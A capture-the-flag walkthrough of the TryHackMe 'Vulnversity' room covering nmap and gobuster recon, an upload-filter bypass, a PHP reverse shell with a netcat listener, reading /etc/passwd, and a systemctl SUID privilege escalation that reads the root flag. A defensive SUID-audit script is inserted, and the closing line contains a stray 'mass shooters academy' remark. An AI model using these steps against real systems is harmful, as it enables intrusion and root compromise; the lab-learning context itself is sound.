Tryhackme - Vulnversity


In this walkthrough, we will go through the Vulnversity room from Tryhackme. The room is rated Easy on the platform and is designed to test our active recon, web app attack and privilege escalation skills. So, let’s get started without any delay.


Machine Info:

Objective: Learn about active recon, web app attacks and privilege escalation.

Task 1 – Deploy the machine

Task 2 – Reconnaissance

Question 1 – There are many nmap “cheatsheets” online that you can use too.


Question 2 – Scan the box, how many ports are open?

nmap scan


Question 3 – What version of the squid proxy is running on the machine?

nmap output


Question 4 – How many ports will nmap scan if the flag -p-400 was used?


Question 5 – Using the nmap flag -n what will it not resolve?


Question 6 – What is the most likely operating system this machine is running?


Question 7 – What port is the web server running on?

HTTP version


Question 8 – It’s important to ensure you are always doing your reconnaissance thoroughly before progressing. Knowing all open services (which can all be points of exploitation) is very important. Don’t forget that ports in a higher range might be open, so always scan ports after 1000 (even if you leave scanning in the background).


Task 3 – Locating directories using GoBuster

Question 1 – Run Gobuster

gobuster dir -u -w ~/Desktop/common.txt


Question 2 – What is the directory that has an upload form page?

gobuster scan

internal directory

Upload functionality


Task 4 – Compromise the webserver

Question 1 – What common file type, which you’d want to upload to exploit the server, is blocked? Try a couple to find out.


Extension not allowed

cat phpext.txt

Burpsuite intercept

Payload Positions

Payload Options - Simple list


Question 3 – Run this attack, what extension is allowed?

We are going to use a PHP reverse shell as our payload. A reverse shell works by being called on the remote host and forcing this host to make a connection to you. So you’ll listen for incoming connections, upload and have your shell executed which will beacon out to you to control!

  • edit the IP in the pentestmonkey reverse shell.
  • change the extension to “.phtml”.
  • upload the shell to the web server.
  • set up a netcat listener -> nc -lvnp 1234
  • execute the shell by visiting the following URL ->


netcat listener


Question 4 – What is the name of the user who manages the webserver?

cat /etc/passwd


Question 5 – What is the user flag?



Task 5 – Privilege Escalation

Question 1 – On the system, search for all SUID files. What file stands out?

find / -user root -perm -4000 -exec ls -ldb {} \;

find command output
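
From the defender's side, the same search works as a periodic audit: list every setuid file and flag the ones that can run arbitrary commands, which is why systemctl stands out here. The script below is an added example, not part of the original walkthrough; `audit_suid` and `REVIEW_LIST` are hypothetical names, the list is a constructed, non-exhaustive sample, and `-user root` is dropped so setuid files owned by other accounts are reported too.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): SUID audit.
# REVIEW_LIST is a constructed, non-exhaustive list of programs that can run
# arbitrary commands and should not normally carry the setuid bit.
REVIEW_LIST="systemctl find vim nano bash sh env python perl awk"

# audit_suid DIR
# Prints one line per setuid file under DIR:
#   REVIEW <path>   basename is on REVIEW_LIST
#   ok     <path>   anything else
# Returns 1 if at least one REVIEW line was printed, 0 otherwise.
audit_suid() {
    dir=$1
    flagged=0
    tmp=$(mktemp) || return 2
    # -xdev stays on one filesystem; -perm -4000 matches the setuid bit.
    find "$dir" -xdev -type f -perm -4000 2>/dev/null | sort > "$tmp"
    while IFS= read -r path; do
        name=$(basename "$path")
        verdict=ok
        for risky in $REVIEW_LIST; do
            if [ "$name" = "$risky" ]; then
                verdict=REVIEW
                flagged=1
            fi
        done
        printf '%-6s %s\n' "$verdict" "$path"
    done < "$tmp"
    rm -f "$tmp"
    return "$flagged"
}

# Run only when a directory is given on the command line, e.g.:
#   sh suid_audit.sh /
if [ "$#" -gt 0 ]; then
    audit_suid "$1"
fi
```

Any REVIEW line is a candidate for `chmod u-s` after confirming nothing depends on the bit.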


Question 2 – It’s challenge time! We have guided you this far; are you able to exploit this system further to escalate your privileges and get the final answer? Become root and get the last flag (/root/root.txt)

# Temporary unit file path (the GTFOBins entry defines TF this way)
TF=$(mktemp).service
echo '[Service]
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]' > $TF
systemctl link $TF
systemctl enable $TF


priv esc exploit

systemctl start tmp.J18wiFxTNV.service


root flag





So that was “Vulnversity” for you. Let’s sum it up quickly. We started off with a regular nmap scan with version detection and found many open ports. We then enumerated one of them further by directory brute-forcing it with gobuster and, as a result, found an internal directory with file upload functionality. We bypassed the extension filtering on uploads with the help of Burp Suite and got our initial access by catching a reverse shell on our netcat listener. At last, we escalated our privileges by abusing the misconfigured systemctl binary with the help of GTFOBins and got our root flag and an entry in the mass shooters academy. On that note, I will take my leave and will see you in the next one. Till then, “Hack the Planet”.
